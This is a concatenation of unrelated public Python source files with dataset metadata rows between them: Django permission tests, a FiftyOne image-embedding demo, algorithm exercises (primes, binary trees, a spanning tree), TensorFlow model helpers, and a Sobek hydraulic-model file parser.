@pytest.mark.django_db # noqa
def test_permission_user_deletion_single(datadir, setup, debug):
    """Deleting a user removes their policy instances and permission set."""
    user1, user2, user3, def_pol, org_pol, prj_pol = setup
    debug('BEFORE')
    user3.delete()
    debug('AFTER')
    # No empty permission set here: the user is gone!
    check(nuser=2, npol=3, npolin=3, npset=2)
@pytest.mark.django_db # noqa
def test_permission_user_deletion_all(datadir, setup, debug):
    """Deleting every user leaves only the policies themselves behind."""
    user1, user2, user3, def_pol, org_pol, prj_pol = setup
    debug('BEFORE')
    user1.delete()
    user2.delete()
    user3.delete()
    debug('AFTER')
    # No empty permission set here: the users are gone!
    check(nuser=0, npol=3, npolin=0, npset=0)
| Cadasta/django-tutelary | tests/test_integrity.py | test_integrity.py | py | 4,068 | python | en | code | 6 | github-code | 36 |
71202438503 | # -*- coding: utf-8 -*-
# @Author: Luis Condados
# @Date: 2023-09-09 18:46:06
# @Last Modified by: Luis Condados
# @Last Modified time: 2023-09-16 18:33:43
import fiftyone as fo
import fiftyone.zoo as foz
import fiftyone.brain as fob
from sklearn.cluster import KMeans
import click
import logging
logging.basicConfig(level=logging.INFO)
def create_dataset_from_dir(images_dir, name=None, persistent=False):
    """Build a FiftyOne dataset from all images under images_dir (recursive)."""
    dataset = fo.Dataset.from_images_dir(images_dir=images_dir,
                                         name=name,
                                         persistent=persistent,
                                         recursive=True)
    return dataset
@click.command()
@click.option('--images_dir', '-i')
@click.option('--dataset_name', '--name', '-n')
@click.option('--persistent', '-p', type=bool, default=True, is_flag=True)
@click.option('--n_clusters', default=None, type=int)
def main(images_dir, dataset_name, persistent, n_clusters):
    """Load/create a dataset, embed it, optionally cluster, launch the app."""
    # Reuse an existing dataset of the same name instead of re-importing.
    if fo.dataset_exists(dataset_name):
        logging.info('Dataset {} already exists.'.format(dataset_name))
        dataset = fo.load_dataset(dataset_name)
    else:
        dataset = create_dataset_from_dir(images_dir, dataset_name)
    dataset.persistent = persistent

    ####################
    # Compute embeddings
    ####################
    logging.info('Computing embedding ...')
    #TIP: run foz.list_zoo_models() to see the whole list of models
    # model = foz.load_zoo_model("mobilenet-v2-imagenet-torch")
    model = foz.load_zoo_model('clip-vit-base32-torch')
    embeddings = dataset.compute_embeddings(model)

    logging.info('Working on the 2D for visualization ...')
    # Image embeddings
    fob.compute_visualization(dataset,
                              brain_key="latent_space",
                              embeddings=embeddings,
                              )
    # to enable the "search for similarity" feature
    fob.compute_similarity(dataset, embeddings=embeddings)

    ####################
    # K-means Clustering
    ####################
    if n_clusters != None:
        logging.info('Computing k-means clustering ...')
        k_means = KMeans(init="k-means++", n_clusters=n_clusters, n_init=10)
        k_means.fit(embeddings)
        # Tag each sample with the id of the cluster it fell into.
        for i, sample in enumerate(dataset):
            cluster_id = k_means.labels_[i]
            sample['cluster_id'] = cluster_id
            sample.save()

    ################
    # Launch the App
    ################
    session = fo.launch_app(dataset)
    # Blocks execution until the App is closed
    session.wait()
if __name__ == "__main__":
main() | Gabriellgpc/exploratory_image_data_analysis | workspace/demo.py | demo.py | py | 2,617 | python | en | code | 0 | github-code | 36 |
22833245357 | import math
def isPrime(n):
i = 2
while(i<=math.sqrt(n)):
if(n%i==0):
return False
else:
i += 1
return True
def sieve(n):
p_n = {}
for i in range(2,n):
p_n[i] = True
for j in range(2,n):
if p_n[j] == True:
for a in range(2*j,n,j):
p_n[a] = False
return p_n
if __name__ == "__main__":
# n = int(input("Enter number to check for primality: "))
# if(isPrime(n)):
# print("{} is a Prime Number.".format(n))
# else:
# print("{} is not a Prime Number.".format(n))
test = sieve(2000000)
n = int(input("Enter n < 2000000 to check for primality:"))
print("{} is".format(n),end=" ")
if not test[n]: print("not", end = " ")
print("prime.")
| joshuanazareth97/Project-Euler | Prime.py | Prime.py | py | 788 | python | en | code | 0 | github-code | 36 |
73485134183 | # https://programmers.co.kr/learn/courses/30/lessons/42897
def solution(money):
stole0_pprev = stole0_prev = money[0]
stole1_pprev, stole1_prev = 0, money[1]
for m in money[2:]:
stole0_pprev, stole0_prev = stole0_prev, max(stole0_prev, stole0_pprev + m)
stole1_pprev, stole1_prev = stole1_prev, max(stole1_prev, stole1_pprev + m)
return max(stole0_pprev, stole1_prev) | lexiconium/algorithms | programmers/dp/theft_light.py | theft_light.py | py | 405 | python | en | code | 0 | github-code | 36 |
73050884903 | """....."""
brick_height = int(input('brick_height = '))
brick_width = int(input('brick_width = '))
brick_depth = int(input('brick_depth = '))
hole_height = int(input('hole_height = '))
hole_width = int(input('hole_width = '))
# Find two minimum dimensions of the hole
hole_min_0 = min(hole_width, hole_height)
hole_min_1 = max(hole_width, hole_height)
# Find two minimum dimensions of the brick
brick_max = max(brick_depth, brick_width, brick_height)
if brick_height == brick_max:
x = brick_width
y = brick_depth
elif brick_width == brick_max:
x = brick_height
y = brick_depth
else:
x = brick_width
y = brick_height
brick_min_0 = min(x, y)
brick_min_1 = max(x, y)
# Check if the brick can be passed into the hole
if brick_min_0 <= hole_min_0 and brick_min_1 <= hole_min_1:
print("YES")
else:
print("NO")
# brick_params = sorted([brick_width, brick_height, brick_depth]) # 2, 3, 4
# hole_params = sorted([hole_height, hole_width]) # 3, 2
#
# if brick_params[0] <= hole_params[0] and brick_params[1] <= hole_params[1]:
# print('YES')
# else:
# print('NO')
| ave2407/CourseraPythonProjects | week2/if/if_castle.py | if_castle.py | py | 1,102 | python | en | code | 0 | github-code | 36 |
8694387627 | import pandas as pd
import numpy as np
import os
from datetime import timedelta
import math
pd.set_option('display.width', 1200)
pd.set_option('precision', 3)
np.set_printoptions(precision=3)
np.set_printoptions(threshold=np.nan)
class Config:
__instance = None
def __new__(cls, *args, **kwargs):
if cls.__instance is None:
cls.__instance = object.__new__(cls, *args, **kwargs)
return cls.__instance
def __init__(self):
print('Init Config!', os.getpid())
# 文件路径相关参数
self.rootPath = os.path.split(os.path.abspath(os.path.dirname(__file__)))[0]
self.ZZ800_DATA = self.rootPath + '/data/800_data.csv'
self.ZZ800_RAW_DATA = self.rootPath + '/data/800_raw_data.csv'
self.ZZ800_CODES = self.rootPath + '/data/800_codes.csv'
self.ZZ800_RM_VR_FFT = self.rootPath + '/data/800_rm_vr_fft.csv'
self.MARKET_RATIO = self.rootPath + '/data/index_ratio.csv'
self.TRAINING_DAY = self.rootPath + '/data/trading_day.csv'
# self.speed_method = 'value_ratio_fft_euclidean' # for 沪深300指数预测
self.speed_method = 'rm_market_vr_fft' # for 沪深800选股
self.update_start = '2018-05-18' # 更新数据的开始时间(数据库日期的最后一天的下一天)
self.update_end = '2018-05-21' # 更新数据的结束时间(这一天也会被更新下来)
self.auto_update = False # 回测时是否自动更新数据
self.plot_simi_stock = False # 是否画出相似股票
# self.is_regression_test = False # 是回测还是预测
# self.start_date = pd.to_datetime('2018-05-16') #回测的开始时间。 比如'2018-01-01',则从'2018-01-02'开始做预测
# self.regression_days = 5
self.is_regression_test = True
self.start_date = pd.to_datetime('2011-01-01')
self.regression_days = 800
self.regression_end_date = self.start_date + timedelta(days=self.regression_days) # 回测结束时间
# 相似性查找参数
self.pattern_length = 30
self.nb_similar_make_prediction = 20 # avergae them as a pred
self.nb_similar_of_all_similar = 4000 # 从所有股票的相似票中选择top N
self.nb_similar_of_each_stock = 200
self.slide_window = 1500
self.weighted_dist = True
self.weight_a = 1
self.weight_b = 2
self.alpha = np.multiply([1, 1, 1, 1, 1], 40)
self.beata = np.multiply([1, 1, 1, 1, 1], math.pi / 180)
self.fft_level = 5
self.similarity_method = 'euclidean' # or 'pearsonr'
self.cores = 20
self.nb_codes = 800
# 输出文件地址
name = str(self.start_date.date()) + '_' + str(self.speed_method) + '_' + str(self.nb_similar_make_prediction)
self.PEARSON_CORR_RESLUT = self.rootPath + '/output/corr' + name + '.csv'
self.PRDT_AND_ACT_RESULT = self.rootPath + '/output/pred' + name +'.csv'
self.regression_result = self.rootPath + '/pic/para_' + name + '.png'
config = Config()
if __name__ == '__main__':
std_data = pd.read_csv(config.DATA)
| cheersyouran/simi-search | codes/config.py | config.py | py | 3,162 | python | en | code | 10 | github-code | 36 |
6084442031 | # Binary Tree
class Node:
def __init__(self, data):
self.data = data
self.left = None
self.right = None
def insert(self, data):
# check if tree is null
if self.data:
# check 2 conditions: self.data > data or < data
if self.data > data:
if self.left is None:
self.left = Node(data)
else:
self.left.insert(data)
elif self.data < data:
if self.right is None:
self.right = Node(data)
else:
self.right.insert(data)
else:
self.data = data
def print(self):
if self.left:
self.left.print()
print(self.data)
if self.right:
self.right.print()
# inorder
def inorder(self, root):
res = []
if root:
res = self.inorder(root.left)
res.append(root.data)
res += self.inorder(root.right)
return res
# preorder
def preorder(self, root):
res = []
if root:
res.append(root.data)
res += self.preorder(root.left)
res += self.preorder(root.right)
return res
# postorder
def postorder(self, root):
res = []
if root:
res = self.postorder(root.left)
res += self.postorder(root.right)
res.append(root.data)
return res
# Full Binary Tree: a node that has 0 or 2 children
def isFullBinaryTree(self, root):
if root is None:
return True
if root.left is None and root.right is None:
return True
if root.left is not None and root.right is not None:
return self.isFullBinaryTree(root.left) and self.isFullBinaryTree(root.right)
return False
def depth(self, root):
d = 0
while root:
d += 1
root = root.left
return d
def bfs_tree(self, root, res):
print('data: ',root.data)
if root is None:
return
if root.left or root.right:
if root.left:
res.append(root.left.data)
if root.right:
res.append(root.right.data)
if root.left:
res = self.bfs_tree(root.left, res)
if root.right:
res = self.bfs_tree(root.right, res)
return res
# A Perfect Binary Tree: a tree that has both left and right children from every node from every level, and leaf nodes should be in the same level.
# depth: O(ln(n)) where n is # of nodes
# # of nodes: = 2^(h+1) - 1
# leaf nodes: 2^h
def isPerfectBinaryTree(self, root, d, level=0):
# base case: if root is null
if root is None:
return True
print('d: ', d)
if root.left is None and root.right is None:
return (d == level + 1)
# only 1 child is None
if root.left is None or root.right is None:
return False
return self.isPerfectBinaryTree(root.left, d, level + 1) and self.isPerfectBinaryTree(root.right, d, level + 1)
# count # of nodes
def countNodes(self, root):
if root is None:
return 0
return 1 + self.countNodes(root.left) + self.countNodes(root.right)
# Complete Binary Tree: all nodes leaning towards the left
def isCompleteBinaryTree(self, root, index, num_nodes):
if root is None:
return True
if index >= num_nodes:
return False
return self.isCompleteBinaryTree(root.left, 2 * index + 1, num_nodes) and self.isCompleteBinaryTree(root.right, 2 * index + 2, num_nodes)
def isBalancedBinaryTree(self, root, height):
if root is None:
return True
left_height = Height()
right_height = Height()
l = self.isBalancedBinaryTree(root.left, left_height)
r = self.isBalancedBinaryTree(root.right, right_height)
# update current root node's height
height.height = max(left_height.height, right_height.height) + 1
if abs(left_height.height - right_height.height) <= 1:
return l and r
return False
class Height:
def __init__(self):
self.height = 0
def MinimalTree(array):
tree = Node(array[len(array) // 2])
for element in array:
tree.insert(element)
return tree
# List of Depths - can do bfs
class LLNode:
def __init__(self,data):
self.data = data
self.next = None
class LinkedList:
def __init__(self):
self.head = None
def add(self, data):
node = LLNode(data)
node.next = self.head
self.head = node
def addToEnd(self, data):
node = LLNode(data)
if self.head is None:
node.next = self.head
self.head = node
current = self.head
while current.next:
current = current.next
node.next = current.next
current.next = node
def createLevelLL(root, lists, level):
if root is None:
return
linked_list = None
if len(lists) == level: # if level is not contained in list
linked_list = LinkedList()
lists.append(linked_list)
else:
linked_list = lists[level]
linked_list.add(root)
createLevelLL(root.left, lists, level + 1)
createLevelLL(root.right, lists, level + 1)
def list_of_depth(root):
lists = []
createLevelLL(root, lists, 0)
return lists
array = [3,5,6,9,10,13]
minimal_tree = MinimalTree(array)
minimal_tree.print()
print(minimal_tree.preorder(minimal_tree))
print(minimal_tree.postorder(minimal_tree))
print(minimal_tree.inorder(minimal_tree))
# tree = Node(10)
# tree.insert(3)
# tree.insert(4)
# tree.insert(12)
# tree.insert(13)
# tree.print()
# print(tree.inorder(tree))
# print(tree.preorder(tree))
# print(tree.postorder(tree))
# print(tree.isFullBinaryTree(tree))
root = Node(2)
root.insert(1)
root.insert(3)
root.left.print()
root.right.print()
# root.left.left = Node(4)
# root.left.right = Node(5)
# root.right.left = Node(6)
# root.right.right = Node(7)
if root.isCompleteBinaryTree(root, 0, root.countNodes(root)):
print('The tree is a complete binary tree')
if (root.isPerfectBinaryTree(root, root.depth(root))):
print("The tree is a perfect binary tree")
else:
print("The tree is not a perfect binary tree")
height = Height()
root = Node(1)
root.left = Node(2)
root.right = Node(3)
root.left.left = Node(4)
root.left.right = Node(5)
root.left.right.left = Node(6)
root.left.right.right = Node(7)
root.right.left = Node(8)
root.right.right = Node(9)
lists = list_of_depth(root)
for list in lists:
current = list.head
while current:
print(current.data.data)
current = current.next
print()
if root.isBalancedBinaryTree(root, height):
print('The tree is balanced')
else:
print('The tree is not balanced') | phuclinh9802/data_structures_algorithms | chapter 4/tree/tree.py | tree.py | py | 7,056 | python | en | code | 0 | github-code | 36 |
71408403945 | """ The simple neural model definitions. """
from __future__ import absolute_import, division, print_function
import numpy as np
import tensorflow as tf
def neural_net(x, layers, keep_prob, weight_decay):
y = tf.contrib.layers.flatten(x)
embedding_layer = None
for i, layer in enumerate(layers[:-1]):
y = tf.contrib.layers.fully_connected(y, layer,
weights_initializer=tf.contrib.layers.xavier_initializer(),
weights_regularizer=tf.contrib.layers.l2_regularizer(weight_decay))
embedding_layer = y
y = tf.nn.relu(y)
y = tf.nn.dropout(y, keep_prob=keep_prob)
return tf.contrib.layers.fully_connected(y, layers[-1],
weights_initializer=tf.contrib.layers.xavier_initializer(),
weights_regularizer=tf.contrib.layers.l2_regularizer(weight_decay)), \
embedding_layer
def conv_net(x, convs, fullys, keep_prob, weight_decay):
y = x
for conv in convs:
y = tf.contrib.layers.conv2d(y, conv[0], kernel_size=[conv[1], conv[1]], stride=[1, 1], padding='SAME',
weights_initializer=tf.contrib.layers.xavier_initializer_conv2d(),
weights_regularizer=tf.contrib.layers.l2_regularizer(weight_decay),
activation_fn=tf.nn.relu)
y = tf.contrib.layers.max_pool2d(y, kernel_size=[2, 2], padding='SAME')
y = tf.reshape(y, [-1, np.prod(y.get_shape().as_list()[1:])])
return neural_net(y, fullys, keep_prob, weight_decay)
| b3nk4n/tensorflow-handwriting-demo | tensorflow/models.py | models.py | py | 1,678 | python | en | code | 0 | github-code | 36 |
12573596280 | def reversewords(s):
container = []
s = s.split(" ")
z = ""
for x in s:
container.append(x)
container = container[::-1]
for x in range(0,len(container)):
z += str(container[x])
z += " "
return z
print(reversewords("Hello this is max"))
| AG-Systems/programming-problems | other/reversewordsinstring.py | reversewordsinstring.py | py | 289 | python | en | code | 10 | github-code | 36 |
32688598523 | """
DjikistraAlgorithm
"""
import math
from random import randint
class DjikistraAlgorithm():
"""
class DjikistraAlgorithm
create minimum spanning tree path
"""
def __init__(self):
self.matrix=[]
self.vertex=''
self.num_vertices=self.input_vertex()
self.create_matrix()
def create_matrix(self):
'''
method - create adjacency matrix - represantation of graph
'''
self.matrix=[[randint(0,15) if row!=column else 0 for column in range(0,self.num_vertices)]for row in range(0,self.num_vertices)]
#customization values in matrix
for row in range(0,self.num_vertices):
for column in range(0,self.num_vertices):
self.matrix[column][row]=self.matrix[row][column]
#if one vertices has not edges, create new matrix again
for array in self.matrix:
if any(array)<1:
self.create_matrix()
def display_matrix(self):
"""
method - display matrix
"""
for nums in self.matrix:
print(nums)
def input_vertex(self):
"""
method - input number of vertices
"""
while self.vertex not in range(0,10):
self.vertex=int(input("Choose number of vertices in range[0,10]: "))
return self.vertex
def start_minimum_spanning_tree(self):
"""
method - create minimum spanning tree
"""
#create list of vertices, only first vertex is active
selected_vector=[False if x!=0 else True for x in range(0,self.num_vertices)]
weight=0
connections_between_vertices=0
#if there are less connections between vertices than number vertices-1,perform operations
while connections_between_vertices<self.num_vertices-1:
index_of_row_minimum_value=0
index_of_column_minimum_value=0
minimum=math.inf
for row in range(0,self.num_vertices):
if selected_vector[row]:
for column in range(0,self.num_vertices):
if (self.matrix[row][column]>0 and not selected_vector[column]):
if self.matrix[row][column]<minimum:
minimum=self.matrix[row][column]
index_of_row_minimum_value=row
index_of_column_minimum_value=column
#if value of edges is chosen,we change the value on 0
self.matrix[index_of_row_minimum_value][index_of_column_minimum_value]=0
self.matrix[index_of_column_minimum_value][index_of_row_minimum_value]=0
#added minimum value to weight
weight+=minimum
#we activate vector which is bound by edge which we selected
selected_vector[index_of_column_minimum_value]=True
#added minimum value to edges next vector which was selected
for value in range(0,self.num_vertices):
if self.matrix[index_of_column_minimum_value][value]!=0:
self.matrix[index_of_column_minimum_value][value]+=minimum
print(f"Edge ({index_of_row_minimum_value}-{index_of_column_minimum_value}) and weight of edge={minimum}. All weight of edges={weight}")
selected_vector[index_of_column_minimum_value]=True
#added minimum value to weight vertices which are selected
connections_between_vertices+=1
print(f'Minimum spanning tree weight={weight}')
def __main__():
djkistra=DjikistraAlgorithm()
djkistra.display_matrix()
djkistra.start_minimum_spanning_tree()
if __name__=="__main__":
__main__()
| bl94/djikistra_algorithm | djikistra_algorithm.py | djikistra_algorithm.py | py | 3,716 | python | en | code | 0 | github-code | 36 |
73200838504 | # -*- coding: utf-8 -*-
"""
Created on Thu Jul 11 14:15:46 2019
@author: danie
"""
import geopandas as gpd
import pandas as pd
from shapely.geometry import LineString, Point
import os
import re
import numpy as np
import hkvsobekpy as his
import csv
#%%
def __between(value, a, b):
# Find and validate before-part.
pos_a = value.find(a)
if pos_a == -1:
return ""
# Find and validate after part.
pos_b = value.rfind(b)
if pos_b == -1:
return ""
# Return middle part.
adjusted_pos_a = pos_a + len(a)
if adjusted_pos_a >= pos_b:
return ""
return value[adjusted_pos_a:pos_b]
def __split_line(lineString, point, buffer=False):
if not buffer:
pointIntersect = point
else:
pointIntersect = point.buffer(buffer)
coords = lineString.coords
j = None
for i in range(len(coords) - 1):
if LineString(coords[i : i + 2]).intersects(pointIntersect):
j = i
break
assert j is not None
# Make sure to always include the point in the first group
return (
coords[: j + 1] + [Point(point).coords[0]],
[Point(point).coords[0]] + coords[j + 1 :],
)
__friction_models = {
"0": "chezy",
"1": "manning",
"2": "strickler (kn)",
"3": "strickler (ks)",
"4": "white-colebrook",
"7": "bos and bijkerk",
}
__flow_boundary_types = {"0": "waterlevel", "1": "discharge"}
__structure_types = {"6": "weir", "7": "orifice", "9": "pump"}
__structure_flow_dirs = {"0": "both", "1": "positive", "2": "negative", "3": "no_flow"}
__pump_control = {"1": "suction", "2": "delivery", "3": "both_sides"}
__control_types = {"0": "time", "1": "hydraulic", "2": "interval", "3": "PID"}
__control_param = {
"0": "crest_level",
"1": "crest_width",
"2": "gate_height",
"3": "pump_capacity",
}
__profile_types = {}
__match_num = "[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?"
# %% read network
def network(path, crs):
"""Read al network-files."""
links = gpd.GeoDataFrame(
columns=["ID", "FROM_NODE", "TO_NODE", "geometry"], geometry="geometry"
)
nodes = gpd.GeoDataFrame(columns=["ID", "geometry"], geometry="geometry")
with open(os.path.join(path, "network.tp"), "r") as networkTP:
for line in networkTP.readlines():
if line[0:4] == "NODE":
ident = __between(line, "id '", "' nm")
x = float(__between(line, "px ", " py"))
y = float(__between(line, "py ", " node"))
nodes = nodes.append(
{"ID": ident, "geometry": Point(x, y)}, ignore_index=True
)
elif line[0:4] == "BRCH":
ident = __between(line, "id '", "' nm")
from_node = __between(line, "bn '", "' en")
to_node = __between(line, "en '", "' al")
links = links.append(
{"ID": ident, "FROM_NODE": from_node, "TO_NODE": to_node},
ignore_index=True,
)
# open network.cp to define channel geometry
with open(os.path.join(path, "network.cp"), "r") as networkCP:
for reach in networkCP.read().split("BRCH")[1:]:
ident = __between(reach, "id '", "' cp")
cps = __between(reach, "TBLE\n", " <\ntble").split(" <\n")
from_node = list(links.loc[links["ID"] == ident, "FROM_NODE"])[0]
to_node = list(links.loc[links["ID"] == ident, "TO_NODE"])[0]
coord_list = list(
list(nodes.loc[nodes["ID"] == from_node].geometry)[0].coords
)
sumDistance = 0.0
for idx, cp in enumerate(cps):
distance, angle = cp.split()
distance = (float(distance) - sumDistance) * 2
angle = np.deg2rad(90 - float(angle))
x = coord_list[-1][0] + float(distance) * np.cos(angle)
y = coord_list[-1][1] + float(distance) * np.sin(angle)
coord_list += [(x, y)]
sumDistance += distance
coord_list[-1] = list(
list(nodes.loc[nodes["ID"] == to_node].geometry)[0].coords
)[0]
index = links.loc[links["ID"] == ident].index[0]
links.at[index, "geometry"] = LineString(coord_list)
network = {}
objects = gpd.GeoDataFrame(
columns=["ID", "TYPE", "LINK", "LINK_POS", "geometry"],
geometry="geometry",
crs=crs,
)
objects_list = []
with open(os.path.join(path, "network.ntw"), "r") as networkNTW:
doLinks = True
for idx, l in enumerate(
csv.reader(
networkNTW.readlines(),
quotechar='"',
delimiter=",",
quoting=csv.QUOTE_ALL,
)
):
if idx > 0:
if doLinks:
if l[0] == "*":
doLinks = False
if doLinks:
network.update(
{
l[0]: {
"properties": {
"type": l[4],
"customType": l[5],
"startNode": l[14],
"endNode": l[27],
},
"lineString": [
[float(l[21]), float(l[22])],
[float(l[34]), float(l[35])],
],
}
}
)
if not l[14] in objects_list:
objects_list.append(l[14])
objects = objects.append(
{
"ID": l[14],
"NAME": l[15],
"TYPE": l[19],
"geometry": Point([float(l[21]), float(l[22])]),
},
ignore_index=True,
)
if not l[27] in objects_list:
objects_list.append(l[27])
objects = objects.append(
{
"ID": l[27],
"NAME": l[28],
"TYPE": l[32],
"geometry": Point([float(l[34]), float(l[35])]),
},
ignore_index=True,
)
h_points = gpd.GeoDataFrame(
columns=["ID", "geometry"], geometry="geometry", crs=crs
)
v_links = gpd.GeoDataFrame(
columns=["ID", "TYPE", "CUSTOM_TYPE", "FROM_NODE", "TO_NODE", "geometry"],
geometry="geometry",
crs=crs,
)
with open(os.path.join(path, "network.gr"), "r") as networkGR:
hLocations = his.read_his.ReadMetadata(
os.path.join(path, "calcpnt.his"), hia_file="auto"
).GetLocations()
for reach in networkGR.read().split("GRID")[1:]:
ident = __between(reach, "id '", "' ci")
line = list(links.loc[links["ID"] == ident, "geometry"])[0]
gridTable = __between(reach, "TBLE\n", " <\ntble").split(" <\n")
for idx, grid in enumerate(gridTable):
grid = grid.split()
h_point = grid[3].replace("'", "")
if h_point in hLocations: # check if point is ignored by Sobek-core
point = (float(grid[5]), float(grid[6]))
if h_point not in list(h_points["ID"]):
h_points = h_points.append(
{"ID": h_point, "geometry": Point(point)}, ignore_index=True
)
if idx == 0:
v_point = grid[4].replace("'", "")
Type = network[v_point]["properties"]["type"]
customType = network[v_point]["properties"]["customType"]
pointFrom = h_point
else:
pointTo = h_point
segment, line = __split_line(
LineString(line), Point(point), buffer=0.01
)
v_links = v_links.append(
{
"ID": v_point,
"TYPE": Type,
"CUSTOM_TYPE": customType,
"FROM_NODE": pointFrom,
"TO_NODE": pointTo,
"geometry": LineString(segment),
},
ignore_index=True,
)
v_point = grid[4].replace("'", "")
pointFrom = h_point
# use ID as index
for df in [links, nodes, objects, v_links]:
df.index = df["ID"]
with open(os.path.join(path, "network.cr"), "r") as networkCR:
for line in networkCR:
if re.match("CRSN", line):
object_id = re.search(".id '(.*)' nm.", line).group(1)
objects.loc[object_id, "LINK"] = re.search(".ci '(.*)' lc", line).group(
1
)
objects.loc[object_id, "LINK_POS"] = float(
re.search(".lc (.*) crsn", line).group(1)
)
with open(os.path.join(path, "network.st"), "r") as networkST:
for line in networkST:
if re.match("STRU", line):
object_id = re.search(".id '(.*)' nm.", line).group(1)
objects.loc[object_id, "LINK"] = re.search(".ci '(.*)' lc", line).group(
1
)
objects.loc[object_id, "LINK_POS"] = float(
re.search(".lc (.*) stru", line).group(1)
)
with open(os.path.join(path, "network.cn"), "r") as networkCN:
for line in networkCN:
if re.match("FLBX", line):
object_id = re.search(".id '(.*)' nm.", line).group(1)
objects.loc[object_id, "LINK"] = re.search(".ci '(.*)' lc", line).group(
1
)
objects.loc[object_id, "LINK_POS"] = float(
re.search(".lc (.*) flbx", line).group(1)
)
return {
"links": links.set_crs(crs, inplace=True),
"nodes": nodes.set_crs(crs, inplace=True),
"objects": objects.set_crs(crs, inplace=True),
"segments": v_links.set_crs(crs, inplace=True),
}
def results(path):
"""Read meta-data from his-files."""
files = {
"links": "reachseg.his",
"points": "calcpnt.his",
"structures": "struc.his",
}
result = {"links": None, "points": None, "structures": None}
for key, item in files.items():
if os.path.exists(os.path.join(path, item)):
meta_data = his.read_his.ReadMetadata(
os.path.join(path, item), hia_file="auto"
)
parameters = meta_data.GetParameters()
locations = meta_data.GetLocations()
result.update(
{
key: {
"df": meta_data.DataFrame(),
"parameters": parameters,
"locations": locations,
}
}
)
return result
def parameters(path):
"""Read parameters from a sobek case."""
result = dict()
with path.joinpath("friction.dat").open() as friction_dat:
result["friction"] = dict()
for line in friction_dat:
if re.match(".*BDFR.*", line):
model = __friction_models[__between(line, 'mf', ' mt').replace(' ', '')]
value = float(__between(line, 'mt cp 0', '0 mr').replace(' ', ''))
result['friction']['global'] = {'model': model,
'value': value}
with path.joinpath('struct.dat').open() as struct_dat:
structures = dict()
for line in struct_dat:
if re.match("STRU", line):
struc_id = re.search(".id '(.*)' nm.", line).group(1)
structures[struc_id] = {}
structures[struc_id]["def_id"] = re.search(
".dd '(.*)' ca.", line
).group(1)
structures[struc_id]["control_id"] = re.search(
"cj '(.*)' ", line
).group(1)
structures[struc_id]["control_active"] = bool(
int(re.search(f"ca ({__match_num}) ", line).group(1))
)
result["structures"] = structures
with path.joinpath("struct.def").open() as struct_def:
for stds in struct_def.read().split("stds"):
if "STDS" in stds:
def_id = re.search(".id '(.*)' nm.", stds).group(1)
struc_def = dict()
struc_def["type"] = __structure_types[
re.search(".ty ([0-9]).", stds).group(1)
]
if struc_def["type"] in ["weir", "orifice"]:
struc_def["crest_level"] = float(
re.search(f".cl ({__match_num}).", stds).group(1)
)
struc_def["crest_width"] = float(
re.search(f".cw ({__match_num}).", stds).group(1)
)
struc_def["flow_dir"] = __structure_flow_dirs[
re.search(f".rt ({__match_num}).", stds).group(1)
]
if struc_def["type"] == "weir":
cw = float(re.search(f".sc ({__match_num}).", stds).group(1))
ce = float(re.search(f".ce ({__match_num}).", stds).group(1))
struc_def["coefficient"] = ce * cw
if struc_def["type"] == "orifice":
cw = float(re.search(f".sc ({__match_num}).", stds).group(1))
mu = float(re.search(f".mu ({__match_num}).", stds).group(1))
struc_def["coefficient"] = mu * cw
elif struc_def["type"] == "pump":
struc_def["control_side"] = __pump_control[
re.search(f".dn ({__match_num}).", stds).group(1)
]
stages = (
re.search(".*\nTBLE\n(.*)<\ntble.", stds).group(1).split("<")
)
stages = [stage.split() for stage in stages]
struc_def["pump_stages"] = [
{
"capacity": float(stage[0]),
"suction_on": float(stage[1]),
"suction_off": float(stage[2]),
"delivery_on": float(stage[3]),
"delivery_off": float(stage[4]),
}
for stage in stages
]
struc_id = next(
(
st_id
for st_id, values in structures.items()
if values["def_id"] == def_id
),
None,
)
if struc_id:
result["structures"][struc_id] = {
**result["structures"][struc_id],
**struc_def,
}
else:
print(f"structure definition {def_id} not linked to structure-id")
with path.joinpath("profile.dat").open() as profile_dat:
cross_sections = dict()
for line in profile_dat:
if re.match("CRSN", line):
xs_id = re.search(".id '(.*)' di.", line).group(1)
cross_sections[xs_id] = re.search(".di '(.*)' rl.", line).group(1)
result["cross_sections"] = cross_sections.copy()
with path.joinpath("profile.def").open() as profile_dat:
for crds in profile_dat.read().split("crds"):
if "CRDS" in crds:
def_id = re.search(".id '(.*)' nm.", crds).group(1)
xs_type = re.search(f".ty ({__match_num}).", crds).group(1)
crds = crds.replace("\n", "")
coords = re.search(r".*TBLE(.*)<tble.", crds).group(1).split("<")
if xs_type == "0":
z = np.array([float(coord.split()[0]) for coord in coords])
w = np.array([float(coord.split()[1]) for coord in coords])
series = pd.Series(
data=np.concatenate([np.flip(z), z]),
index=np.concatenate([np.flip(-w / 2), w / 2]),
)
else:
print(f"ERROR: structure type {xs_type} not supported!")
prof_ids = [
xs_id
for xs_id, xs_def in cross_sections.items()
if xs_def == def_id
]
if prof_ids:
for prof_id in prof_ids:
result["cross_sections"][prof_id] = series.copy()
else:
print(f"profile definition {def_id} not linked to profile-id")
return result
def control(path):
"""Read controls from a sobek case."""
result = dict()
with path.joinpath("control.def").open() as control_def:
for cntl in control_def.read().split("cntl"):
if "CNTL" in cntl:
cntl_def = {}
def_id = re.search(".id '(.*)' nm.", cntl).group(1)
cntl_def["type"] = __control_types[
re.search(f".ct ({__match_num}).", cntl).group(1)
]
cntl_def["parameter"] = __control_param[
re.search(f".ca ({__match_num}).", cntl).group(1)
]
if cntl_def["type"] == "PID":
cntl_def["min_value"] = float(
re.search(f".ui ({__match_num}) ", cntl).group(1)
)
cntl_def["max_value"] = float(
re.search(f".ua ({__match_num}) ", cntl).group(1)
)
elif cntl_def["type"] == "time":
crest_levels = []
for cntl_line in cntl.splitlines():
if "<" in cntl_line:
crest_levels.append(float(cntl_line.split(" ")[1]))
if len(crest_levels) > 0:
cntl_def["min_value"] = np.min(crest_levels)
cntl_def["max_value"] = np.max(crest_levels)
tble_str = cntl.replace("\n", "")
if "TBLE" in tble_str:
cntl_def["table"] = {}
tbl_props = re.findall("PDIN (.*) pdin", tble_str)
if len(tbl_props) > 0:
tbl_props = tbl_props[0].split()
cntl_def["table"]["function"] = tbl_props[0]
cntl_def["table"]["use_periodicity"] = bool(int(tbl_props[1]))
if cntl_def["table"]["use_periodicity"] == "1":
cntl_def["table"]["periodicity"] = tbl_props[2]
tble_list = (
re.search(r".*TBLE(.*)<tble.", tble_str).group(1).split("<")
)
date_time = [
pd.to_datetime(row.split()[0], format="'%Y/%m/%d;%H:%M:%S'")
for row in tble_list
]
values = [float(row.split()[1]) for row in tble_list]
